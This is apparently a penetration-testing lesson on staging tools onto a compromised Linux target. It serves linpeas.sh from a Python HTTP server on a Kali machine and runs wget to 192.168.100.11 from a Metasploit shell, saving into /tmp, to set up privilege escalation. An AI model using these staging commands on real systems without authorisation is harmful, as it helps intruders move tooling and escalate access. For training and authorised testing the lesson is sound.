In this section, you will learn how to perform basic file transfers between an attacker and a target machine using a simple Python server. This technique is essential for penetration testing, as it allows you to transfer tools, scripts, or payloads from your attacker machine to the target system efficiently. By setting up a temporary HTTP server with Python on your attacker machine and using wget on the target machine, you can easily download files across the network. This method is particularly useful for scenarios where traditional file transfer methods are unavailable or impractical.
To find potential privesc paths, we will need to upload the linpeas.sh script from here:
https://github.com/carlospolop/PEASS-ng
Make sure to download the linpeas.sh file from their releases to a folder on your kali machine which you will use as a server for the transfer. For this lesson, we use the “server” directory in your kali home directory.
NOTE: If you do not have this directory, simply navigate to your home directory and create the folder/directory:
cd ~
mkdir serverNow download the linpeas.sh script:
cd server
wget https://github.com/carlospolop/PEASS-ng/releases/download/20231112-0a42c550/linpeas.sh
In order to initiate the transfer, we must make our server available on the network using the python http server module. Run the following command – and be sure to note the IP of your attack machine on the network:
python3 -m http.server 80
Your python server will be running on port 80 and can be accessed via http through the browser.
On the Metasploit session where you currently have a shell on the target, run the following command to cd into the /tmp folder first, which most of the time will not restrict from downloading files to from a low priv access account and run the wget command:
cd /tmp
wget http://192.168.100.11:80/linpeas.sh
